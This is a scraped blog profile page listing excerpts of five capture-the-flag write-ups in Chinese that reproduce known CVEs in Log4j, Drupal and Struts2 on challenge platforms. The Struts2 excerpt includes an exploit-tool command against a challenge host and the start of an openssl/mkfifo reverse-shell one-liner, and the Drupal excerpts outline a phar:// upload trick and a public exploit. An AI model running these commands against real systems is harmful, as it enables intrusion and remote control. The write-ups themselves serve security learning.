自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 登陆不了 CTFshow

登陆不了 CTFshow参考文档

2022-03-31 21:55:02 555

原创 [Log4j]CVE-2021-44228 CTFshow

Log4j复现 CTFshow复现参考文档1复现参考文档2环境http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/2.0 <= Apache log4j2 <= 2.14.1简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式

2022-03-31 17:50:19 3554

原创 [Drupal]CVE-2019-6339 BUUCTF

[Drupal]CVE-2019-6339参考文档前期准备还是和之前一样,语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步利用找到管理员资料头像上传处Drupal 的图片默认存储位置为 /sites/default/files/pictures//,默认存储名称为其原来的名称/admin/config/media/file-system处设置临时目录phar://./sites/default/files/pictures/202

2022-03-29 18:41:11 233 1

原创 [Drupal]CVE-2018-7600 BUUCTF

[Drupal]CVE-2018-7600 BUUCTF前期准备进入之后环境安装语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步利用直接使用网上公开的exp https://github.com/a2u/CVE-2018-7600将exp里的命令换成env即可反弹会话可参考我上一篇文章,ssl反弹shell...

2022-03-29 17:30:53 4561

原创 [struts2]s2-052 BUUCTF

[struts2]s2-052 BUUCTF参考文档本地检测python struts-pwn.py --url "http://node4.buuoj.cn:29619/orders/3/edit"vps使用openssl生成生成证书的公私钥对openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes在自己的vps上创建一个openssl反弹会话的脚本mkfifo /tmp/s; /b

2022-03-29 13:42:52 3688

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除